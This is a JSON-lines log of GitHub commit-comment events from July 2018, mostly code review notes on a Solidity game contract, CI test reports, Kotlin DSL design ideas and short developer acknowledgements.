{"id":"7956634303","type":"CommitCommentEvent","actor":{"login":"PravinaBhatt"},"repo":{"name":"hhaccessibility/hhaccessibility.github.io"},"payload":{"comment":{"id":29686230,"position":null,"line":null,"path":null,"commit_id":"da9de7d63bf12d5be5a8308425d87f458cc17f2a","created_at":"2018-07-12T14:31:38Z","updated_at":"2018-07-12T14:31:38Z","author_association":"COLLABORATOR","body":"Hello Josh, \r\n    I added space between Send Message button and the survey link, please check it.\r\nThank you"}},"created_at":"2018-07-12T14:31:38Z"}
{"id":"7956636917","type":"CommitCommentEvent","actor":{"login":"muckachina"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29686239,"position":null,"line":null,"path":null,"commit_id":"21614fc757b1782fb7a1fb398dab7b299198f569","created_at":"2018-07-12T14:32:04Z","updated_at":"2018-07-12T14:32:04Z","author_association":"COLLABORATOR","body":"Thanks :) tested via git"}},"created_at":"2018-07-12T14:32:04Z"}
{"id":"7956637237","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686241,"position":57,"line":57,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:32:08Z","updated_at":"2018-07-12T14:32:08Z","author_association":"NONE","body":"Oh! just like that you reset the game and still make a move below?\r\nThat sounds like a breach of expectations from the user's point of view.\r\nYou should do `require` instead so that you do not embark the user on a game they did not know what being reset."}},"created_at":"2018-07-12T14:32:08Z"}
{"id":"7956639738","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-locationbasedaccess"},"payload":{"comment":{"id":29686252,"position":13,"line":57,"path":"api/src/main/java/org/openmrs/module/locationbasedaccess/PatientSearchAdviser.java","commit_id":"dc1f2548225252ed3356e967bee0e402c2f4d8a6","created_at":"2018-07-12T14:32:30Z","updated_at":"2018-07-12T14:32:30Z","author_association":"MEMBER","body":"Did you see the question from Wyclif about a possible NPE?"}},"created_at":"2018-07-12T14:32:30Z"}
{"id":"7956640917","type":"CommitCommentEvent","actor":{"login":"moneymakerser"},"repo":{"name":"moneymakerser/Broadway-design"},"payload":{"comment":{"id":29686256,"position":5,"line":9,"path":"Index.html","commit_id":"df18d5e06728cadf1772ecd6ce2f2088b27ee9a2","created_at":"2018-07-12T14:32:41Z","updated_at":"2018-07-12T14:32:41Z","author_association":"OWNER","body":"заебись бегущая строка : ) @mgalievb2b "}},"created_at":"2018-07-12T14:32:41Z"}
{"id":"7956642932","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29686259,"position":null,"line":null,"path":null,"commit_id":"d9ac5f768cf09b1b1cfbc544374b95ea6ac4d9fc","created_at":"2018-07-12T14:33:00Z","updated_at":"2018-07-12T14:33:00Z","author_association":"MEMBER","body":"\\o/"}},"created_at":"2018-07-12T14:33:00Z"}
{"id":"7956646706","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686262,"position":null,"line":null,"path":null,"commit_id":"a220129693b67620c5ebcfc120b5165f6ab5901c","created_at":"2018-07-12T14:33:34Z","updated_at":"2018-07-12T14:33:34Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:33:34Z"}
{"id":"7956647952","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29686264,"position":null,"line":null,"path":null,"commit_id":"9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff","created_at":"2018-07-12T14:33:46Z","updated_at":"2018-07-12T14:33:46Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T14:33:46Z"}
{"id":"7956648495","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686266,"position":null,"line":null,"path":null,"commit_id":"7ab8963e09fb6c343d04eb0c060d9d4c199a968a","created_at":"2018-07-12T14:33:51Z","updated_at":"2018-07-12T14:33:51Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:33:51Z"}
{"id":"7956650127","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686269,"position":null,"line":null,"path":null,"commit_id":"0911f798a7a2eb1c9fd64d395c707a06c69922dd","created_at":"2018-07-12T14:34:08Z","updated_at":"2018-07-12T14:34:08Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:34:08Z"}
{"id":"7956652339","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686274,"position":null,"line":null,"path":null,"commit_id":"aac44ba2991707189024bf7147d9abf93bdb216d","created_at":"2018-07-12T14:34:27Z","updated_at":"2018-07-12T14:34:27Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:34:27Z"}
{"id":"7956654072","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686277,"position":null,"line":null,"path":null,"commit_id":"95c9d1a9b4bc60d74ddd27f3ff5944bcfb31ea0f","created_at":"2018-07-12T14:34:43Z","updated_at":"2018-07-12T14:34:43Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:34:43Z"}
{"id":"7956654234","type":"CommitCommentEvent","actor":{"login":"cdecker"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29686280,"position":null,"line":null,"path":null,"commit_id":"fe405f49beba3686d324aae0e46ec61e77e9621c","created_at":"2018-07-12T14:34:44Z","updated_at":"2018-07-12T14:34:44Z","author_association":"MEMBER","body":"Great observations @SimonVrouwe, I'd indeed be interested in making this approximation more precise (and robust against the >150s issue). So if you open a PR with the correct approximation I'm happy to merge it ^^"}},"created_at":"2018-07-12T14:34:44Z"}
{"id":"7956655075","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29686284,"position":null,"line":null,"path":null,"commit_id":"3b6950b65afa65d2b4d20590ac51fff24d1605a8","created_at":"2018-07-12T14:34:52Z","updated_at":"2018-07-12T14:34:52Z","author_association":"OWNER","body":"Whoops. \r\n\r\nHave you tested the separation between the Atlas V and the Centaur V yet? There was collider clipping when I did it, but I think it was related to the RCS. The Centaur RCS is getting adjusted to be smaller and I'm adding 45 degree versions."}},"created_at":"2018-07-12T14:34:52Z"}
{"id":"7956657463","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29686288,"position":null,"line":null,"path":null,"commit_id":"c420eb1bb06e3fe01526496bcaf2fecc702f2fa4","created_at":"2018-07-12T14:35:15Z","updated_at":"2018-07-12T14:35:15Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2811 of 2972 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 57 tests had: MTR big diffs.\n * 23 tests had: ERR diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 482\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.58%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T14:35:15Z"}
{"id":"7956660100","type":"CommitCommentEvent","actor":{"login":"bwinton"},"repo":{"name":"FirefoxUX/icons"},"payload":{"comment":{"id":29686290,"position":null,"line":null,"path":null,"commit_id":"0c752f537120a4c902bb3c9e8d0585bce363d080","created_at":"2018-07-12T14:35:39Z","updated_at":"2018-07-12T14:35:39Z","author_association":"CONTRIBUTOR","body":"Wait, what? I'm -1 on this change, and in particular it landing without any review!"}},"created_at":"2018-07-12T14:35:39Z"}
{"id":"7956662817","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686297,"position":null,"line":null,"path":null,"commit_id":"65b47a319593051ac3f58db74aceec4949127332","created_at":"2018-07-12T14:36:05Z","updated_at":"2018-07-12T14:36:05Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:36:05Z"}
{"id":"7956664017","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686298,"position":null,"line":null,"path":null,"commit_id":"90effd0b223fd49057e971d435e039079cbf6936","created_at":"2018-07-12T14:36:17Z","updated_at":"2018-07-12T14:36:17Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:36:17Z"}
{"id":"7956664201","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686299,"position":73,"line":73,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:36:18Z","updated_at":"2018-07-12T14:36:18Z","author_association":"NONE","body":"I think that a failure to reveal actually means that the other one won. After all, when 1 reveals, the other can already see if they won or lost. Why will the loser spend gas to reveal a losing move?\r\nSo not revealing == winning. So the winner should get the other player's wager. Not the contract."}},"created_at":"2018-07-12T14:36:18Z"}
{"id":"7956665280","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29686302,"position":58,"line":124,"path":"core/descriptors.jvm/src/org/jetbrains/kotlin/load/java/JvmAbi.java","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T14:36:28Z","updated_at":"2018-07-12T14:36:28Z","author_association":"MEMBER","body":"As discussed, I think we can get rid of this flag"}},"created_at":"2018-07-12T14:36:28Z"}
{"id":"7956665319","type":"CommitCommentEvent","actor":{"login":"varshareddykumbham"},"repo":{"name":"varshareddykumbham/computer-programming-responsive-iiith"},"payload":{"comment":{"id":29686303,"position":null,"line":null,"path":null,"commit_id":"e34dc35ce8061e4d494ccbcf757dd90af9b45e07","created_at":"2018-07-12T14:36:28Z","updated_at":"2018-07-12T14:36:28Z","author_association":"OWNER","body":"Change is made"}},"created_at":"2018-07-12T14:36:28Z"}
{"id":"7956667097","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29686308,"position":20,"line":986,"path":"ogsr_engine/xrGame/WeaponMagazined.cpp","commit_id":"eaec6351222bf89c64e0d58e9911b231586446ed","created_at":"2018-07-12T14:36:44Z","updated_at":"2018-07-12T14:36:44Z","author_association":"CONTRIBUTOR","body":"Поправил тут https://github.com/KRodinn/OGSR-Engine/pull/60\r\nСорри, буду проверять лучше в след раз. У меня просто секции прицелов есть везде."}},"created_at":"2018-07-12T14:36:44Z"}
{"id":"7956669538","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686314,"position":80,"line":80,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:37:07Z","updated_at":"2018-07-12T14:37:07Z","author_association":"NONE","body":"You should indent better. 4 spaces."}},"created_at":"2018-07-12T14:37:07Z"}
{"id":"7956673743","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686322,"position":84,"line":84,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:37:46Z","updated_at":"2018-07-12T14:37:46Z","author_association":"NONE","body":"It would be less scary if you had written `else if (activePlayerAddress...`"}},"created_at":"2018-07-12T14:37:46Z"}
{"id":"7956676825","type":"CommitCommentEvent","actor":{"login":"mist801125"},"repo":{"name":"magnumopusnetwork/alchimia"},"payload":{"comment":{"id":29686328,"position":null,"line":null,"path":null,"commit_id":"85a60d20f0e5a10f4089da32ce9ae21d3fbcbaab","created_at":"2018-07-12T14:38:15Z","updated_at":"2018-07-12T14:38:15Z","author_association":"NONE","body":"Nice Works!!"}},"created_at":"2018-07-12T14:38:15Z"}
{"id":"7956678839","type":"CommitCommentEvent","actor":{"login":"garima4567"},"repo":{"name":"mdekauwe/mdekauwe.github.io"},"payload":{"comment":{"id":29686333,"position":5,"line":33,"path":"index.html","commit_id":"c521405b095b3f4d82c182041f458e3d111e6ed0","created_at":"2018-07-12T14:38:33Z","updated_at":"2018-07-12T14:38:33Z","author_association":"NONE","body":"hello"}},"created_at":"2018-07-12T14:38:33Z"}
{"id":"7956679032","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686334,"position":85,"line":85,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:38:35Z","updated_at":"2018-07-12T14:38:35Z","author_association":"NONE","body":"Why is it only the second player that appears to pay the commission?"}},"created_at":"2018-07-12T14:38:35Z"}
{"id":"7956681592","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29686341,"position":null,"line":null,"path":null,"commit_id":"3af382e7bdf0123f2db2219633eabd6bde5dc101","created_at":"2018-07-12T14:38:59Z","updated_at":"2018-07-12T14:38:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-143857 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-143857\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T14:38:59Z"}
{"id":"7956685677","type":"CommitCommentEvent","actor":{"login":"HadrienGardeur"},"repo":{"name":"readium/r2-shared-swift"},"payload":{"comment":{"id":29686349,"position":null,"line":null,"path":null,"commit_id":"f7a95423667f6cb32e71fc3a0d1c8cb8cb1f6267","created_at":"2018-07-12T14:39:37Z","updated_at":"2018-07-12T14:39:37Z","author_association":"NONE","body":"I think we need to be careful with that one.\r\n\r\n@JayPanoz this probably needs a default setting per font, right? Isn't that something that was already part of the current stylesheets?"}},"created_at":"2018-07-12T14:39:37Z"}
{"id":"7956687403","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686356,"position":86,"line":86,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:39:54Z","updated_at":"2018-07-12T14:39:54Z","author_association":"NONE","body":"You could rename `savedAddress` to `player1`, that would be more expressive..."}},"created_at":"2018-07-12T14:39:54Z"}
{"id":"7956690960","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29686364,"position":null,"line":null,"path":null,"commit_id":"69980af932ddcc34fc4d5b941174434af246380c","created_at":"2018-07-12T14:40:28Z","updated_at":"2018-07-12T14:40:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-42](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T14:40:28Z"}
{"id":"7956692049","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686365,"position":60,"line":60,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:40:38Z","updated_at":"2018-07-12T14:40:38Z","author_association":"NONE","body":"Sounds like a deadline. Perhaps rename accordingly."}},"created_at":"2018-07-12T14:40:38Z"}
{"id":"7956693726","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29686367,"position":null,"line":null,"path":null,"commit_id":"c420eb1bb06e3fe01526496bcaf2fecc702f2fa4","created_at":"2018-07-12T14:40:54Z","updated_at":"2018-07-12T14:40:54Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T14:40:54Z"}
{"id":"7956695683","type":"CommitCommentEvent","actor":{"login":"balramsinghindia"},"repo":{"name":"balramsinghindia/Website-Performance-Optimization-Techniques"},"payload":{"comment":{"id":29686371,"position":null,"line":null,"path":null,"commit_id":"77de331794d0c6643364fb0d9463a43af0335fc7","created_at":"2018-07-12T14:41:13Z","updated_at":"2018-07-12T14:41:13Z","author_association":"OWNER","body":"looks fine."}},"created_at":"2018-07-12T14:41:13Z"}
{"id":"7956699881","type":"CommitCommentEvent","actor":{"login":"craigboldy"},"repo":{"name":"craigboldy/cb-barebones"},"payload":{"comment":{"id":29686376,"position":null,"line":null,"path":null,"commit_id":"a63252fd46aeeeee72dde0516f880adf50bc2893","created_at":"2018-07-12T14:41:52Z","updated_at":"2018-07-12T14:41:52Z","author_association":"OWNER","body":"Merge"}},"created_at":"2018-07-12T14:41:52Z"}
{"id":"7956715046","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"codeofhonor-dev/android_kernel_huawei_hi6250"},"payload":{"comment":{"id":29686404,"position":null,"line":null,"path":null,"commit_id":"f4718a22862b9386f7f12c2c95e917779a73e43d","created_at":"2018-07-12T14:44:16Z","updated_at":"2018-07-12T14:44:16Z","author_association":"NONE","body":"Well, this works on MY codebase for SOME devices. This modification is for the cypress touchscreen driver. The first step in solving this problem is to find out what TS hardware you have. Then check where the code is for disabling the LCD. The touchscreen driver typically hooks into the LCD event to know when the touchscreen should be disabled. Typically this is done from the hwcomposer like this : https://github.com/codeofhonor-dev/android_device_huawei_hi6250-common/blob/lineage-14.1/libhwcomposer/hwcomposer.cpp#L264\r\n\r\n"}},"created_at":"2018-07-12T14:44:16Z"}
{"id":"7956720275","type":"CommitCommentEvent","actor":{"login":"pavlovskiypavel89"},"repo":{"name":"pavlovskiypavel89/JSGame"},"payload":{"comment":{"id":29686420,"position":null,"line":null,"path":null,"commit_id":"8b63138fc17a554fb859001a7ffeefcc75063e56","created_at":"2018-07-12T14:45:04Z","updated_at":"2018-07-12T14:45:04Z","author_association":"OWNER","body":"279 // Add a LevelParser for the created schemas:*"}},"created_at":"2018-07-12T14:45:04Z"}
{"id":"7956722406","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686427,"position":114,"line":114,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:45:23Z","updated_at":"2018-07-12T14:45:23Z","author_association":"NONE","body":"Again here, an `else if` would show your intent that the 2 `if`s are mutually exclusive."}},"created_at":"2018-07-12T14:45:23Z"}
{"id":"7956724810","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686434,"position":120,"line":120,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:45:45Z","updated_at":"2018-07-12T14:45:45Z","author_association":"NONE","body":"Oh wow add `else if` everywhere you meant."}},"created_at":"2018-07-12T14:45:45Z"}
{"id":"7956728450","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686439,"position":134,"line":134,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:46:19Z","updated_at":"2018-07-12T14:46:19Z","author_association":"NONE","body":"I am sure you can find a better name than `equalMove`."}},"created_at":"2018-07-12T14:46:19Z"}
{"id":"7956732620","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686446,"position":128,"line":128,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:46:57Z","updated_at":"2018-07-12T14:46:57Z","author_association":"NONE","body":"I have difficulty following the logic here."}},"created_at":"2018-07-12T14:46:57Z"}
{"id":"7956737824","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686452,"position":164,"line":164,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:47:45Z","updated_at":"2018-07-12T14:47:45Z","author_association":"NONE","body":"What if I pass `0` or `4`, can I cheat?"}},"created_at":"2018-07-12T14:47:45Z"}
{"id":"7956740946","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29686458,"position":13,"line":13,"path":"auth/server/services/authenticate.js","commit_id":"c5b93d1c13973231d7cf5b5ca29110a533212893","created_at":"2018-07-12T14:48:13Z","updated_at":"2018-07-12T14:48:13Z","author_association":"COLLABORATOR","body":"remember this should be 401"}},"created_at":"2018-07-12T14:48:13Z"}
{"id":"7956742499","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29686460,"position":8,"line":8,"path":"auth/server/services/authenticate.js","commit_id":"c5b93d1c13973231d7cf5b5ca29110a533212893","created_at":"2018-07-12T14:48:27Z","updated_at":"2018-07-12T14:48:27Z","author_association":"COLLABORATOR","body":"this one should be a 401 also"}},"created_at":"2018-07-12T14:48:27Z"}
{"id":"7956749953","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686477,"position":168,"line":168,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:49:30Z","updated_at":"2018-07-12T14:49:30Z","author_association":"NONE","body":"Can you find a way to dissociate the game from withdrawing the winnings. Otherwise, I can imagine you can get stuck.\r\n"}},"created_at":"2018-07-12T14:49:30Z"}
{"id":"7956750514","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686481,"position":144,"line":144,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:49:39Z","updated_at":"2018-07-12T14:49:39Z","author_association":"NONE","body":"Do you expect this length to be any longer than 2?"}},"created_at":"2018-07-12T14:49:39Z"}
{"id":"7956752744","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29686483,"position":3,"line":3,"path":"client/constants.js","commit_id":"c5b93d1c13973231d7cf5b5ca29110a533212893","created_at":"2018-07-12T14:50:00Z","updated_at":"2018-07-12T14:50:00Z","author_association":"COLLABORATOR","body":"please add the 'API' word to this 2,ex: LOGIN_API_URL"}},"created_at":"2018-07-12T14:50:00Z"}
{"id":"7956753373","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29686487,"position":null,"line":null,"path":null,"commit_id":"d9ac5f768cf09b1b1cfbc544374b95ea6ac4d9fc","created_at":"2018-07-12T14:50:06Z","updated_at":"2018-07-12T14:50:06Z","author_association":"MEMBER","body":"Maybe we should go even further and annotate methods like `apply` to describe the available names (and types)?\r\n\r\n```java\r\n    public void apply(@NamedArguments(ObjectConfigurationAction.class) Map<String, ?> options);\r\n```\r\n\r\nMore generally:\r\n\r\n```java\r\ninterface SomeInterface {\r\n\r\n  interface NamedArgumentsForFunction {\r\n    void name(String stringArgument);\r\n    void name(Class<?> classArgument);\r\n  // etc...\r\n  }\r\n\r\n  ...\r\n\r\n  public void function(@NamedArguments(NamedArgumentsForFunction.class) Map<String, ?> options);\r\n}\r\n```\r\n\r\nSo we can enhance the code generator to emit overloads such as:\r\n\r\n```kotlin\r\nfun SomeInterface.function(stringArgument: String) =\r\n  function(mapOf(\"stringArgument\" to stringArgument))\r\n\r\nfun SomeInterface.function(classArgument: Class<*>) =\r\n  function(mapOf(\"classArgument\" to classArgument))\r\n```"}},"created_at":"2018-07-12T14:50:06Z"}
{"id":"7956755718","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"prittyskaria/RockPaperScissors"},"payload":{"comment":{"id":29686491,"position":144,"line":144,"path":"contracts/RockPaperScissors.sol","commit_id":"b3584d84c68d742b8dda5f20d83a18fbc214d633","created_at":"2018-07-12T14:50:28Z","updated_at":"2018-07-12T14:50:28Z","author_association":"NONE","body":"Is it possible to start another game or is it a one-off only contract?"}},"created_at":"2018-07-12T14:50:28Z"}
{"id":"7956761541","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29686504,"position":null,"line":null,"path":null,"commit_id":"39fbb60af60e210373c6782cedcbdae730f105f0","created_at":"2018-07-12T14:51:20Z","updated_at":"2018-07-12T14:51:20Z","author_association":"OWNER","body":"```\r\nimport sys\r\nsys.path\r\nsys.argv  #input some arguments to made a list, if no input, there is still a path in the list\r\nprint(sys.argv[2])\r\n\r\nimport os\r\nos.system('shell order')  #execute the shell order\r\nres=os.popen('shell order').read()  #assign the shell order result to the variable 'res'\r\nprint(res)\r\n```"}},"created_at":"2018-07-12T14:51:20Z"}
{"id":"7956763106","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29686508,"position":null,"line":null,"path":null,"commit_id":"d9ac5f768cf09b1b1cfbc544374b95ea6ac4d9fc","created_at":"2018-07-12T14:51:33Z","updated_at":"2018-07-12T14:51:33Z","author_association":"MEMBER","body":"I meant the following overloads:\r\n\r\n```kotlin\r\nfun SomeInterface.function(name: String) =\r\n  function(mapOf(\"name\" to name))\r\n\r\nfun SomeInterface.function(name: Class<*>) =\r\n  function(mapOf(\"name\" to name))\r\n```"}},"created_at":"2018-07-12T14:51:33Z"}
{"id":"7956764600","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29686512,"position":21,"line":126,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/AsmUtil.java","commit_id":"e282002e8a361ca70a088817df3b46621e92e037","created_at":"2018-07-12T14:51:47Z","updated_at":"2018-07-12T14:51:47Z","author_association":"MEMBER","body":"I didn't notice anything on unsigned classes in tests?"}},"created_at":"2018-07-12T14:51:47Z"}
